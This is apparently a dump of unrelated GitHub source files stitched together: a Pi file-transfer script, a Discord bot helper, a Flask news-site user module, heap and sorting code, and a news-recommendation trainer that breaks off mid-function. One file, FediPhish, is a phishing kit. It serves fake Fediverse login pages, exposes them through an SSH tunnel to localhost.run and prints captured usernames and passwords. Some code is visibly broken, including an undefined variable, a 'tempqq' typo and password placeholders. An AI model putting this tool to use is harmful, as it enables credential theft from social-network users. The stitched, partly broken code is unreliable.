scp.put('/home/pi/MotMot/latlng.txt', remote_path='/var/www/html') #file that will be transfered to the server and the location it will be saved too (this will overwrite the file on the server everytime)
scp.close() #closes the connection
def main():
time.sleep(10)
while True:
parser()
removeDups()
timeSorter()
time.sleep(5)
transfer()
main()
``` |
{
"source": "1337vrt/FediPhish",
"score": 2
} |
#### File: FediPhish/core/main.py
```python
from subprocess import Popen as bg_cmd,DEVNULL,getoutput as bg_cmd_output
import time,os
from core.doge import *
def banner():
print('''
\033[40m\033[31m\033[01m* _____ _ _ ____ _ _ _ *
| ___|__ __| (_) _ \| |__ (_)___| |__
| |_ / _ \/ _` | | |_) | '_ \| / __| '_ \
| _| __/ (_| | | __/| | | | \__ \ | | |
|_| \___|\__,_|_|_| |_| |_|_|___/_| |_|
* *
Phish the Fediverse :)
v1.1 @1337vrt doge xD \033[0m''')
def intro():
banner()
print('''
\033[41m\033[01m\033[93mUsage of FediPhish for attacking targets
without prior mutual consent is illegal.\033[0m''')
def startup():
bg_cmd('rm -r server && mkdir server',shell=True,stderr=DEVNULL,stdout=DEVNULL)
bg_cmd('rm link',shell=True,stderr=DEVNULL,stdout=DEVNULL)
check_php = bg_cmd_output('which php')
if check_php == '':
col_exit("I require php but it's not installed.")
exit()
def stop_services():
bg_cmd('killall -9 ssh && killall -2 php',shell=True,stderr=DEVNULL,stdout=DEVNULL)
def move_files(web):
bg_cmd('cp -r ./core/web/'+web+'/* ./server',shell=True,stderr=DEVNULL,stdout=DEVNULL)
bg_cmd('cp ./core/web/login.php ./server',shell=True,stderr=DEVNULL,stdout=DEVNULL)
def web_list():
print('\n\033[01m\033[35mAvailable phishing modules\033[0m\033[01m')
print('+'+'-'*30+'+')
print('[1] Diaspora\t[4] Mastodon\n[2] GNU-Social\t[5] Pixelfed\n[3] Hubzilla\t[6] Socialhome')
print('+'+'-'*30+'+')
print('[99] Exit')
while 1:
ch=input('\n\033[35mFediPhish>\033[0m ')
if ch in ['1','2','3','4','5','6','99']:
break
else:
print('\033[31m\033[01mInvalid')
if ch=='1':
selected='Diaspora'
elif ch=='2':
selected='GNU-Social'
elif ch=='3':
selected='Hubzilla'
elif ch=='4':
selected='Mastodon'
elif ch=='5':
selected='Pixelfed'
elif ch=='6':
selected='Socialhome'
elif ch=='99':
exit()
return selected
def start_server(port,selected):
move_files(selected)
os.system('clear')
banner()
col_selected(selected)
col_info('Starting php server [localhost:'+port+']...','')
bg_cmd('php -S localhost:'+port+' -t ./server',shell=True,stderr=DEVNULL,stdout=DEVNULL)
print('\33[92m'+' done'+'\33[0m')
col_info('Exposing localhost:'+port+' to the Internet...','')
print(end='',flush=True)
bg_cmd('sh -c "ssh -o StrictHostKeyChecking=no -R 80:localhost:'+port+' [email protected] 2>/dev/null 1> link" &',shell=True,stderr=DEVNULL,stdout=DEVNULL)
time.sleep(8)
print('\33[92m'+' done'+'\33[0m')
link = bg_cmd_output('grep -o "https://[0-9a-z]*\.localhost.run" link')
link_text=f'Link: {link}'
col_info(link_text)
col_info('Waiting for target to login')
def get_creds():
col_info('Credentials found')
user = bg_cmd_output('cat ./server/creds.txt | head -1')
passwd = bg_cmd_output('cat ./server/creds.txt | tail -1')
print(f'[Username] : {user}\n[Password] : {passwd}')
``` |
{
"source": "1337xp/OpenSourceBot",
"score": 3
} |
#### File: OpenSourceBot/utilities/default.py
```python
import random
import json
def config(filename: str = "configuration"):
""" Get default configuration file """
try:
with open(f"{filename}.json", encoding='utf8') as data:
return json.load(data)
except FileNotFoundError:
raise FileNotFoundError("Could not find JSON file.")
def random_colour():
return random.randint(0, 0xffffff)
``` |
{
"source": "13460991260/shop",
"score": 2
} |
#### File: info/news/user.py
```python
from flask import Blueprint,render_template,jsonify,g,session,make_response,request,redirect,url_for
from utils.captcha.captcha import captcha
from models import *
from werkzeug.security import generate_password_hash,check_password_hash
from utils.comm import isLogin
from utils.constand import admin_news_count
from apps import photos
user_blue = Blueprint('user',__name__)
#展示首页
@user_blue.route("/get_image")
def get_image():
name,text,image_url = captcha.generate_captcha()
session['image_code'] = text.upper()
response = make_response(image_url)
response.headers['Content-Type'] = 'image/jpg'
return response
@user_blue.route("/index")
def index():
return render_template('news/text.html')
#注册用户
@user_blue.route("/register",methods=['post'])
def register():
print(request.form)
mes={}
mobile = request.form.get('mobile',0)
password = request.form.get('password','')
sms_code = request.form.get('sms_code','')
try:
agree = int(request.form.get('agree'))
except:
agree = 2
print(mobile+"##"+password+"##"+sms_code+"##"+str(agree))
if not all([mobile,password,sms_code,agree]):
mes['code'] = 10010
mes['message'] = '参数不完整'
else:
#是否同意协议
if agree == 1:
#判断图片验证码是否正确
imagecode = session.get('image_code')
if imagecode.upper() != sms_code.upper():
mes['code'] = 10040
mes['message'] = '验证码不匹配'
else:
password = generate_password_hash(password)
user = User(nick_name=mobile,password_hash=password,mobile=mobile)
print(user)
db.session.add(user)
session['username'] = mobile
mes['code'] = 200
mes['message'] = '验证成功'
else:
mes['code'] = 10020
mes['message'] = "必须同意"
return jsonify(mes)
#显示用户中心
@user_blue.route("/user_info")
@isLogin
def user_info():
user = g.user
data = {'user_info':user}
return render_template('news/user.html',data=data)
#登录
@user_blue.route("/login",methods=["post",'get'])
def login():
mes = {}
if request.method == "POST":
username = request.form.get('mobile')
password = request.form.get('password')
print(username)
print(password)
if not all([username,password]):
mes['code'] = 10010
mes['message'] = '用户密码不能为空'
else:
user = User.query.filter(User.mobile==username).first()
if not user:
mes['code'] = 10011
mes['message'] = '用户不存在'
else:
flag = check_password_hash(user.password_hash,password)
if flag:
session['username'] = username
session['user_id'] = user.id
mes['code'] = 200
mes['message'] = '登录成功'
else:
mes['code'] = 10020
mes['message'] = '用户或密码错误'
return jsonify(mes)
#退出登录
@user_blue.route("/logout")
def logout():
mes={}
session.pop('username',None)
mes['code'] = 200
return redirect("/")
#显示密码修改页面
@user_blue.route('/pass_info',methods=['post','get'])
def pass_innfo():
username = session.get("username")
if not username:
return redirect(url_for('news.index'))
else:
user = User.query.filter(User.mobile == username).first()
if request.method == "POST":
mes = {}
old_password = request.form.get('old_password')
new_password = request.form.get('new_password')
new_password2 = request.form.get('<PASSWORD>')
if new_password != <PASSWORD>:
mes['code'] = 10010
mes['message'] = '两次密码输入不一致'
return jsonify(mes)
else:
user=User.query.filter(User.id==user.id).first()
password=user.password_hash
if not check_password_hash(password,old_password):
mes['code']=10520
mes['message']="老密码输入不正确"
else:
User.query.filter(User.id==user.id).update({'password_hash':generate_password_hash(new_password2)})
mes['code']= 200
mes['message']= '修改成功'
return jsonify(mes)
return render_template('news/user_pass_info.html')
#显示修改个人资料页面
@user_blue.route("/base_info",methods=['post','get'])
@isLogin
def base_info():
user = g.user
if request.method == 'POST':
signature = request.form.get("signature")
nick_name = request.form.get("nick_name")
gender = request.form.get("gender")
joy = request.form.get("joy")
language = request.form.get("language")
user.nick_name = nick_name
user.signature = signature
user.gender=gender
user.joy = joy
user.language = int(language)
db.session.add(user)
jlist = []
if user.joy:
jlist = [int(i) for i in user.joy.split(",")]
joylist = [{'id':1,'name':'唱歌'},{'id':2,'name':'跳舞'},{'id':3,'name':'看书'}]
data = {'user_info':user,'joylist':joylist,'jlist':jlist}
# print(data)
return render_template("news/user_base_info.html",data=data)
#上传头像
@user_blue.route("/pic_info",methods=['post','get'])
def pic_info():
username = session.get("username")
if not username:
return redirect(url_for('news.index'))
else:
user = User.query.filter(User.mobile == username).first()
if request.method == "POST":
image = request.files['avatar']
file_name = photos.save(image)
#更新数据库
user.avatar_url = "/static/upload/"+file_name
db.session.add(user)
data = {'user_info':user}
return render_template("/news/user_pic_info.html",data=data)
# 新闻发布
@user_blue.route("/news_release",methods=['post','get'])
@isLogin
def news_release():
userid = g.user.id
if request.method == "POST":
data = request.form
title = data.get('title','')
category_id = data.get('category_id',0)
digest = data.get('digest','')
content = data.get('content','')
image = request.files['index_image']
image_url = ""
if image:
image_name = photos.save(image)
image_url = "static/upload/"+image_name
news = News(name=title,cid=category_id,content=content,image_url=image_url,descrp=digest,is_exam=0,reason='',user_id=userid)
db.session.add(news)
return redirect(url_for('user.news_list'))
cate = News_type.query.all()
data = {'cate':cate}
return render_template("news/user_news_release.html",data=data)
#新闻列表
@user_blue.route("/news_list")
@isLogin
def news_list():
user = g.user
current_page = 1
try:
page = int(request.args.get('page',0))
except:
page = 0
#分页
if page>0:
current_page = page
page_count = admin_news_count
news_list = News.query.paginate(current_page,page_count,False)
data = {'news_list':news_list.items,'current_page':news_list.page,'total_page':news_list.pages}
return render_template('news/user_news_list.html',data=data)
#图片上传
@user_blue.route("/upload_img")
def upload_img():
image = request.files['file']
file_name = photos.save(image)
mes = {}
mes['path'] = "/static/upload/"+file_name
mes['error'] = False
return jsonify(mes)
#我的收藏
@user_blue.route("/collection")
@isLogin
def collection():
user = g.user
current_page= request.args.get('p',1)
page_count = 1
collect = user.user_collect.paginate(int(current_page),page_count,False)
data = {'news_list':collect.items,'current_page':collect.page,
'total_page':collect.pages}
return render_template("/news/user_collection.html",data=data)
```
#### File: shop/utils/comm.py
```python
from flask import session,redirect,url_for,g
from models import User
from functools import wraps
#装饰器判断登陆,获取用户信息
def isLogin(func):
@wraps(func)
def wrapper(*args,**kwargs):
username = session.get("username")
if not username:
return redirect(url_for('news.index'))
else:
user = User.query.filter(User.mobile == username).first()
g.user=user
return func(*args,**kwargs)
return wrapper
``` |
{
"source": "13472889991/DataStructures-Algorithms",
"score": 4
} |
#### File: 13472889991/DataStructures-Algorithms/Heap.py
```python
class Heap():
def __init__(self, lst):
self.lst = lst
def __str__(self):
return str(self.lst)
# Returns left child index of node, runs in 0(1) time.Returns none if D.N.E
def left(self, index):
index += 1
if 2 * index >= len(self.lst) + 1:
return None
return (2 * index - 1)
# Returns right child index of node, runs in 0(1) time.Returns none if
# D.N.E
def right(self, index):
index += 1
if 2 * (index) >= len(self.lst):
return None
return (2 * index)
# Returns parent index of the node, runs in 0(1) time.Returns none if D.N.E
def parent(self, index):
if index == 0:
return None
index += 1
return (index // 2 - 1)
# Given a key, finds index of key. Runs in 0(n) time, where N is the size of Heap
# Returns none if D.N.E
def find(self, key):
for counter, value in enumerate(self.lst):
if key == value:
return counter
return None
# appends a key to the end of the heap
def append(self, key):
self.lst.append(key)
# Changes value of a key at a index to new key.
def change(self, index, key):
if index >= len(self.lst):
self.lst[index] = key
# Max_Heapify "fixes" the max heap at the index by swapping it with the
# largest of its children.
def max_heapify(self, index):
largest = index
l = self.left(index)
r = self.right(index)
if(l != None and self.lst[index] < self.lst[l]):
largest = l
if(r != None and self.lst[largest] < self.lst[r]):
largest = r
if largest != index:
temp = self.lst[largest]
self.lst[largest] = self.lst[index]
self.lst[index] = temp
def extract_max(self):
self.lst[0], self.lst[len(self.lst)-1] = self.lst[len(self.lst)-1],self.lst[0]
output = self.lst.pop()
self.build_max_heap()
return output
#Heap_sort sorts the heap.
def build_max_heap(self):
size = len(self.lst)
for i in range(0, size//2):
self.max_heapify(i)
def heap_sort(self):
for i in range (len(self.lst)):
print(self.extract_max())
self.build_max_heap()
def min_heapify(self, index):
smallest = index
l = self.left(index)
r = self.right(index)
if (l != None and self.lst[index] > self.lst[l]):
smallest = l
if (r != None and self.lst[largest] > self.lst[r]):
smallest = r
if smallest != index:
temp = self.lst[smallest]
self.lst[smallest] = self.lst[index]
self.lst[index] = tempqq
```
#### File: 13472889991/DataStructures-Algorithms/Karp-Rabin.py
```python
class RollingHash():
def __init__(self, string=""):
self.string = list(string)
self.hash = sum([ord(i) for i in string])
def remove(self, char):
self.hash -= ord(char)
self.string.pop(0)
def add(self, char):
self.hash += ord(char)
self.string.append(char)
def __str__(self):
return str(self.hash)
def karprabin(target, text):
hash1=RollingHash(target)
hash2=RollingHash(text[0:len(target)])
if hash1.hash == hash2.hash:
if hash1.string == hash2.string:
return True
for i in range(len(target),len(text)):
hash2.remove(hash2.string[0])
hash2.add(text[i])
print(hash1,hash2)
if hash1.hash == hash2.hash:
if hash1.string == hash2.string:
return True
return False
print(karprabin("Hello", "Hello World"))
```
#### File: 13472889991/DataStructures-Algorithms/Sort.py
```python
# Insertion Sort that runs in θ(n^2) time
# TODO:implement with binary search to insert, O(n(lg(n)) time
def insertionSort(lst):
for i in range(1, len(lst)):
key = lst[i]
for z in range(0, i):
if key < lst[i - z]:
temp = lst[i - z]
lst[i - z] = key
lst[i - z + 1] = temp
return lst
# Merge sort that runs in O(n(lg(n))) time
def mergeSort(lst):
if (len(lst) == 1):
return lst
return merge(mergeSort(lst[0:len(lst) // 2]),
mergeSort(lst[len(lst) // 2:]))
def merge(lst, lst2):
# individual list counters
j = 0
k = 0
output = []
# Append inf to end of arrays to make it easier
lst.append(float("inf"))
lst2.append(float("inf"))
for i in range(len(lst) + len(lst2)):
if lst[j] < lst2[k]:
output.append(lst[j])
j += 1
elif lst2[k] < lst[j]:
output.append(lst2[k])
k += 1
elif lst2[k] == lst[j] and lst2[k] != float("inf"):
output.append(lst2[k])
k += 1
return output
def countingSort(lst, maximum = 0):
sort = []
if maximum == 0:
for i in lst:
if maximum < i:
maximum = i
output=[0 for i in range(maximum + 1)]
for i in lst:
output[i]+=1
for counter, value in enumerate(output):
for i in range(value):
sort.append(counter)
return sort
def selectionSort(lst):
output=[]
for i in range(len(lst)):
minimum=lst[0]
for j in (lst):
if minimum > j:
minimum = j
lst.remove(minimum)
output.append(minimum)
return output
``` |
{
"source": "13488151126/mobilenet-yolov4-lite-tf2-main",
"score": 3
} |
#### File: mobilenet-yolov4-lite-tf2-main/img/mask.py
```python
import cv2
import imutils
import numpy as np
import os
def cv_show(name):
cv2.imshow('name', name)
cv2.waitKey(0)
cv2.destroyAllWindows()
# 统一的:mouse callback function
def draw_roi(img):
pts = [(356, 130), (669, 576), (704, 576), (704, 130), (356, 130)] # 用于存放点
mask = np.zeros(img.shape, np.uint8)
points = np.array(pts, np.int32)
points = points.reshape((-1, 1, 2))
# 画多边形
mask = cv2.polylines(mask, [points], True, (255, 255, 255), 2)
mask2 = cv2.fillPoly(mask.copy(), [points], (255, 255, 255)) # 用于求 ROI
mask3 = cv2.fillPoly(mask.copy(), [points], (0, 255, 0)) # 用于 显示在桌面的图像
show_image = cv2.addWeighted(src1=img, alpha=0.8, src2=mask3, beta=0.2, gamma=0)
# cv_show(show_image)
ROI = cv2.bitwise_and(mask2, img)
# res = np.hstack(show_image,ROI)
# cv_show(ROI)
# cv2.imshow("res", res)
# cv2.waitKey(0)
return show_image, ROI
# 创建图像与窗口并将窗口与回调函数绑定
# img = cv2.imread("ori/1618309544.1371417.jpg")
# draw_roi(img)
img_path = 'ori'
dir_path = 'JPGImages'
for files in os.walk(img_path):
for file in files[2]:
fileimgpath = img_path + '\\' + file
img = cv2.imread(fileimgpath)
cv2.imwrite(fileimgpath,img)
show, roi = draw_roi(img)
savepath = dir_path + '\\' + file
cv2.imwrite(savepath, roi)
```
#### File: mobilenet-yolov4-lite-tf2-main/img/xdl33video.py
```python
import cv2
import time
# 相机参数设置
def Setcamera(cap):
cap.set(6, cv2.VideoWriter.fourcc('M', 'J', 'P', 'G'))
cap.set(3, 480)
cap.set(4, 640)
if __name__ == '__main__':
fps = 0.0
# cv2.namedWindow("camera", 1)
# 开启ip摄像头
video = "rtsp://admin:[email protected]/h264/ch1/sub/av_stream"
capture = cv2.VideoCapture(video)
Setcamera(capture)
c = 1
frameRate = 20
num = 0
while True:
ref, frame = capture.read()
if ref:
cv2.imshow("video", frame)
t = 'ori\\' + str(time.time()).split('.', 1)[0]
q = cv2.waitKey(10) & 0xff
if q == ord('q'):
capture.release()
break
elif q == ord('w'):
print(t)
cv2.imwrite(t + '.jpg', frame)
# del ref,frame
# cv2.destroyWindow("camera")
# if __name__ == '__main__':
# fps = 0.0
# cv2.namedWindow("camera", 1)
# # 开启ip摄像头
# video = "http://admin:[email protected]:8081/"
# capture = cv2.VideoCapture(video)
# Setcamera(capture)
# c = 1
# frameRate = 20
# num = 0
# while True:
# t1 = time.time()
#
# ref, frame = capture.read()
#
#
# fps = (fps + (1. / (time.time() - t1))) / 2
# print("fps= %.2f" % fps)
# frame = cv2.putText(frame, "fps= %.2f" % (fps), (0, 40), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 255, 0), 2)
#
# cv2.imshow("video", frame)
# print((time.time() - t1))
# c = cv2.waitKey(30) & 0xff
# if c == ord('q'):
# capture.release()
# break
#
# cv2.destroyWindow("camera")
``` |
{
"source": "13520505/bigdataproj",
"score": 2
} |
#### File: acr_module/acr/acr_trainer_cafebiz.py
```python
import logging
import os
from time import time
import json
import tempfile
import tensorflow as tf
import numpy as np
import pandas as pd
from random import shuffle
from sklearn.preprocessing import StandardScaler
import sys
# sys.path.append("/data1/tungtv/code/chameleon/newsrecomdeepneural")
from acr_module.acr.acr_module_service import get_all_file, split_date, load_json_config
from acr_module.acr.utils import resolve_files, deserialize, serialize, log_elapsed_time
from acr_module.acr.acr_model import ACR_Model
from acr_module.acr.acr_datasets import prepare_dataset
import os.path
from os import path
import mysql.connector
import pickle
import operator
from tensorflow.contrib import predictor
from nar_module.nar.preprocessing.nar_preprocess_cafebiz_2 import delete_all_file_in_path
tf.logging.set_verbosity(tf.logging.INFO)
RANDOM_SEED=42
#Control params
#tf.flags.DEFINE_string('data_dir', default='',
# help='Directory where the dataset is located')
tf.flags.DEFINE_string('train_set_path_regex',
default='/train*.tfrecord', help='Train set regex')
tf.flags.DEFINE_string('model_dir', default='./tmp',
help='Directory where save model checkpoints')
tf.flags.DEFINE_string('input_word_vocab_embeddings_path', default='',
help='Input path for a pickle with words vocabulary and corresponding word embeddings')
tf.flags.DEFINE_string('input_label_encoders_path', default='',
help='Input path for a pickle with label encoders (article_id, category_id, publisher_id)')
tf.flags.DEFINE_string('output_acr_metadata_embeddings_path', default='',
help='Output path for a pickle with articles metadata and content embeddings')
#Model params
tf.flags.DEFINE_string('text_feature_extractor', default="CNN", help='Feature extractor of articles text: CNN or RNN')
tf.flags.DEFINE_string('training_task', default="metadata_classification", help='Training task: (metadata_classification | autoencoder)')
tf.flags.DEFINE_float('autoencoder_noise', default=0.0, help='Adds white noise with this standard deviation to the input word embeddings')
tf.flags.DEFINE_string('cnn_filter_sizes', default="3,4,5", help='CNN layers filter sizes (sliding window over words)')
tf.flags.DEFINE_integer('cnn_num_filters', default=128, help='Number of filters of CNN layers')
tf.flags.DEFINE_integer('rnn_units', default=250, help='Number of units in each RNN layer')
tf.flags.DEFINE_integer('rnn_layers', default=1, help='Number of RNN layers')
tf.flags.DEFINE_string('rnn_direction', default='unidirectional', help='Direction of RNN layers: (unidirectional | bidirectional)')
tf.flags.DEFINE_integer('acr_embeddings_size', default=250, help='Embedding size of output ACR embeddings')
#Training params
tf.flags.DEFINE_integer('batch_size', default=64, help='Batch size')
tf.flags.DEFINE_integer('training_epochs', default=10, help='Training epochs')
tf.flags.DEFINE_float('learning_rate', default=1e-3, help='Lerning Rate')
tf.flags.DEFINE_float('dropout_keep_prob', default=1.0, help='Dropout (keep prob.)')
tf.flags.DEFINE_float('l2_reg_lambda', default=1e-3, help='L2 regularization')
FLAGS = tf.flags.FLAGS
#params_dict = tf.app.flags.FLAGS.flag_values_dict()
#tf.logging.info('PARAMS: {}'.format(json.dumps(params_dict)))
def get_session_features_config(acr_label_encoders):
features_config = {
'single_features':
{'article_id': {'type': 'categorical', 'dtype': 'int'},
'category0': {'type': 'categorical', 'dtype': 'int'},
# 'category1': {'type': 'categorical', 'dtype': 'int'},
# 'author': {'type': 'categorical', 'dtype': 'int'},
'created_at_ts': {'type': 'numerical', 'dtype': 'int'},
'text_length': {'type': 'numerical', 'dtype': 'int'},
},
'sequence_features': {
'text': {'type': 'numerical', 'dtype': 'int'},
'keywords': {'type': 'categorical', 'dtype': 'int'},
# 'concepts': {'type': 'categorical', 'dtype': 'int'},
# 'entities': {'type': 'categorical', 'dtype': 'int'},
'locations': {'type': 'categorical', 'dtype': 'int'},
'persons': {'type': 'categorical', 'dtype': 'int'},
},
'label_features': {
'category0': {'type': 'categorical', 'dtype': 'int', 'classification_type': 'multiclass', 'feature_weight_on_loss': 1.0},
## 'category1': {'type': 'categorical', 'dtype': 'int', 'classification_type': 'multiclass'}, #Too unbalanced
'keywords': {'type': 'categorical', 'dtype': 'int', 'classification_type': 'multilabel', 'feature_weight_on_loss': 1.0},
}
}
#Adding cardinality to categorical features
for feature_groups_key in features_config:
features_group_config = features_config[feature_groups_key]
for feature_name in features_group_config:
if feature_name in acr_label_encoders and features_group_config[feature_name]['type'] == 'categorical':
features_group_config[feature_name]['cardinality'] = len(acr_label_encoders[feature_name])
tf.logging.info('Session Features: {}'.format(features_config))
return features_config
def load_acr_preprocessing_assets(acr_label_encoders_path, word_vocab_embeddings_path):
(acr_label_encoders, labels_class_weights) = deserialize(acr_label_encoders_path)
article_id_encoder = acr_label_encoders['article_id']
tf.logging.info("Read article id label encoder: {}".format(len(acr_label_encoders['article_id'])))
tf.logging.info("Classes weights available for: {}".format(labels_class_weights.keys()))
(word_vocab, word_embeddings_matrix) = deserialize(word_vocab_embeddings_path)
tf.logging.info("Read word embeddings: {}".format(word_embeddings_matrix.shape))
return acr_label_encoders, labels_class_weights, word_embeddings_matrix
def create_multihot_feature(features, column_name, features_config):
column = tf.feature_column.indicator_column(tf.feature_column.categorical_column_with_identity(
key=column_name, num_buckets=features_config['sequence_features'][column_name]['cardinality']))
return column
PREDICTIONS_PREFIX = "predictions-"
def acr_model_fn(features, labels, mode, params):
#keywords_column = create_multihot_feature(features, 'keywords', params['features_config'])
# concepts_column = create_multihot_feature(features, 'concepts', params['features_config'])
# entities_column = create_multihot_feature(features, 'entities', params['features_config'])
locations_column = create_multihot_feature(features, 'locations', params['features_config'])
persons_column = create_multihot_feature(features, 'persons', params['features_config'])
# metadata_input_feature_columns = [concepts_column, entities_column, locations_column, persons_column]
metadata_input_feature_columns = [locations_column, persons_column]
metadata_input_features = {#'concepts': features['concepts'],
# 'entities': features['entities'],
'locations': features['locations'],
'persons': features['persons']}
acr_model = ACR_Model(params['training_task'], params['text_feature_extractor'], features, metadata_input_features,
metadata_input_feature_columns,
labels, params['features_config']['label_features'],
mode, params)
loss = None
if (mode == tf.estimator.ModeKeys.TRAIN or
mode == tf.estimator.ModeKeys.EVAL):
loss = acr_model.total_loss
train_op = None
if mode == tf.estimator.ModeKeys.TRAIN:
train_op = acr_model.train_op
eval_metrics = {}
if (mode == tf.estimator.ModeKeys.TRAIN or
mode == tf.estimator.ModeKeys.EVAL):
eval_metrics = acr_model.eval_metrics
predictions = None
prediction_hooks = None
if mode == tf.estimator.ModeKeys.PREDICT:
predictions = {#Category prediction
#'predicted_category_id': acr_model.predictions,
#Trained ACR embeddings
'acr_embedding': acr_model.article_content_embedding,
#Additional metadata
'article_id': features['article_id'],
'category0': features['category0'],
# 'category1': features['category1'],
# 'author': features['author'],
'keywords': features['keywords'],
# 'concepts': features['concepts'],
# 'entities': features['entities'],
'locations': features['locations'],
'persons': features['persons'],
'created_at_ts': features['created_at_ts'],
'text_length': features['text_length'],
'input_text': features['text']
}
if params['training_task'] == 'autoencoder':
#predictions['input_text'] = features['text']
predictions['predicted_word_ids'] = acr_model.predicted_word_ids
elif params['training_task'] == 'metadata_classification':
#Saves predicted categories
for feature_name in acr_model.labels_predictions:
predictions["{}{}".format(PREDICTIONS_PREFIX, feature_name)] = acr_model.labels_predictions[feature_name]
#prediction_hooks = [ACREmbeddingExtractorHook(mode, acr_model)]
training_hooks = []
if params['enable_profiler_hook']:
profile_hook = tf.train.ProfilerHook(save_steps=100,
save_secs=None,
show_dataflow=True,
show_memory=False)
training_hooks=[profile_hook]
return tf.estimator.EstimatorSpec(
mode=mode,
predictions=predictions,
loss=loss,
train_op=train_op,
eval_metric_ops=eval_metrics,
training_hooks=training_hooks
#prediction_hooks=prediction_hooks,
)
def build_acr_estimator(model_output_dir, word_embeddings_matrix, features_config, labels_class_weights, special_token_embedding_vector, list_args):
params = {'training_task': list_args["training_task"],
'text_feature_extractor': list_args["text_feature_extractor"],
'word_embeddings_matrix': word_embeddings_matrix,
'vocab_size': word_embeddings_matrix.shape[0],
'word_embedding_size': word_embeddings_matrix.shape[1],
'cnn_filter_sizes': list_args["cnn_filter_sizes"],
'cnn_num_filters': list_args["cnn_num_filters"],
'rnn_units': list_args["rnn_units"],
'rnn_layers': list_args["rnn_layers"],
'rnn_direction': list_args["rnn_direction"],
'dropout_keep_prob': list_args["dropout_keep_prob"],
'l2_reg_lambda': list_args["l2_reg_lambda"],
'learning_rate': list_args["learning_rate"],
'acr_embeddings_size': list_args["acr_embeddings_size"],
'features_config': features_config,
'labels_class_weights': labels_class_weights,
'special_token_embedding_vector': special_token_embedding_vector,
'autoencoder_noise': list_args["autoencoder_noise"],
'enable_profiler_hook': False
}
session_config = tf.ConfigProto(allow_soft_placement=True)
run_config = tf.estimator.RunConfig(tf_random_seed=RANDOM_SEED,
save_summary_steps=50,
keep_checkpoint_max=1,
session_config=session_config
)
acr_cnn_classifier = tf.estimator.Estimator(model_fn=acr_model_fn,
model_dir=model_output_dir,
params=params,
config=run_config)
return acr_cnn_classifier
def export_acr_metadata_embeddings(acr_label_encoders, articles_metadata_df, content_article_embeddings):
output_path = FLAGS.output_acr_metadata_embeddings_path
tf.logging.info('Exporting ACR Label Encoders, Article metadata and embeddings to {}'.format(output_path))
to_serialize = (acr_label_encoders, articles_metadata_df, content_article_embeddings)
serialize(output_path, to_serialize)
def get_articles_metadata_embeddings(article_metadata_with_pred_embeddings):
articles_metadata_df = pd.DataFrame(article_metadata_with_pred_embeddings).sort_values(by='article_id')
tf.logging.info("First article id: {}".format(articles_metadata_df['article_id'].head(1).values[0]))
tf.logging.info("Last article id: {}".format(articles_metadata_df['article_id'].tail(1).values[0]))
#Checking whether article ids are sorted and contiguous
# assert (articles_metadata_df['article_id'].head(1).values[0] == 1) #0 is reserved for padding
# assert (len(articles_metadata_df) == articles_metadata_df['article_id'].tail(1).values[0])
content_article_embeddings = np.vstack(articles_metadata_df['acr_embedding'].values)
# #Standardizing the Article Content Embeddings for Adressa dataset, and scaling to get maximum and minimum values around [-6,5], instead of [-40,30] after standardization, to mimic the doc2vec distribution for higher accuracy in NAR module
# scaler = StandardScaler()
# content_article_embeddings_standardized = scaler.fit_transform(content_article_embeddings)
# content_article_embeddings_standardized_scaled = content_article_embeddings_standardized / 5.0
#
#
#Creating and embedding for the padding article
embedding_for_padding_article = np.mean(content_article_embeddings, axis=0)
content_article_embeddings_with_padding = np.vstack([embedding_for_padding_article, content_article_embeddings])
#Checking if content articles embedding size correspond to the last article_id
# assert content_article_embeddings_with_padding.shape[0] == articles_metadata_df['article_id'].tail(1).values[0]+1
#Converting keywords multi-label feature from multi-hot representation back to list of keyword ids
preds_keywords_column_name = "{}{}".format(PREDICTIONS_PREFIX, "keywords")
if preds_keywords_column_name in articles_metadata_df.columns:
articles_metadata_df[preds_keywords_column_name] = articles_metadata_df[preds_keywords_column_name] \
.apply(lambda x: x.nonzero()[0])
# cols_to_export = ['article_id', 'category0', 'category1',
# 'author', 'keywords', 'concepts', 'entities', 'locations', 'persons',
# 'created_at_ts', 'text_length', 'input_text']
cols_to_export = ['article_id', 'category0', 'keywords', 'locations', 'persons',
'created_at_ts', 'text_length', 'input_text']
if FLAGS.training_task == 'autoencoder':
cols_to_export.extend(['predicted_word_ids'])
elif FLAGS.training_task == 'metadata_classification':
#Adding predictions columns for debug
cols_to_export.extend([col for col in articles_metadata_df.columns if col.startswith(PREDICTIONS_PREFIX)])
#Filtering metadata columns to export
# articles_metadata_df = articles_metadata_df[['article_id', 'category0', 'category1',
# 'author', 'keywords', 'concepts', 'entities', 'locations', 'persons',
# 'created_at_ts', 'text_length'] + \
# list([column_name for column_name in articles_metadata_df.columns \
# if column_name.startswith(PREDICTIONS_PREFIX)])] #Adding predictions columns for debug
# articles_metadata_df = articles_metadata_df[['article_id', 'category0', 'keywords', 'locations', 'persons',
# 'created_at_ts', 'text_length'] + \
# list([column_name for column_name in articles_metadata_df.columns \
# if column_name.startswith(
# PREDICTIONS_PREFIX)])] # Adding predictions columns for debug
articles_metadata_df = articles_metadata_df[cols_to_export]
return articles_metadata_df, content_article_embeddings_with_padding
def Merge(dict1, dict2):
return(dict2.update(dict1))
def export_acr_metadata_embeddings_with_datetime(df, acr_label_encoders, articles_metadata_df, content_article_embeddings, path):
# if os.path.exists('./acr_module/config/dict_news_id_encode.pickle'):
# pickle_in = open("./acr_module/config/dict_news_id_encode.pickle", "rb")
# dict_id_old = pickle.load(pickle_in)
#
# list_key_old = list(dict_id_old.keys())
# list_value_old = list(dict_id_old.values())
#
# dict_id_new = acr_label_encoders['article_id']
# list_key_new = list(dict_id_new.keys())
# list_value_new = list(dict_id_new.values())
#
# list_key_old = list_key_old.append(list_key_new)
# list_value_old = list_value_old.append(list_value_new)
#
# acr_label_encoders['article_id'] = dict(zip(list_key_old, list_value_old ))
#
# # Merge(dict_id_old, dict_id_new)
# #
# # acr_label_encoders['article_id'] = dict_id_new
# # acr_label_encoders['article_id'] = sorted(dict_id_new.items(), key=operator.itemgetter(1))
# # acr_label_encoders['article_id'] = dict(acr_label_encoders['article_id'])
if len(os.listdir( path)) != 0 :
(acr_label_encoders_load, articles_metadata_df_load, content_article_embeddings_load) = deserialize((get_all_file( path))[0])
# append article_id
list_key_old = list(df['id'])
list_key_old.insert(0, "<PAD>")
list_value_old = list(df['id_encoded'])
list_value_old.insert(0, 0)
# list_value_old = list(acr_label_encoders_load['article_id'].values())
# list_key_old.extend(list(acr_label_encoders['article_id'].keys()))
# list_value_old.extend(list(acr_label_encoders['article_id'].values()))
#
# print("new and old acr_label_encoders = >>>>>>>>>>")
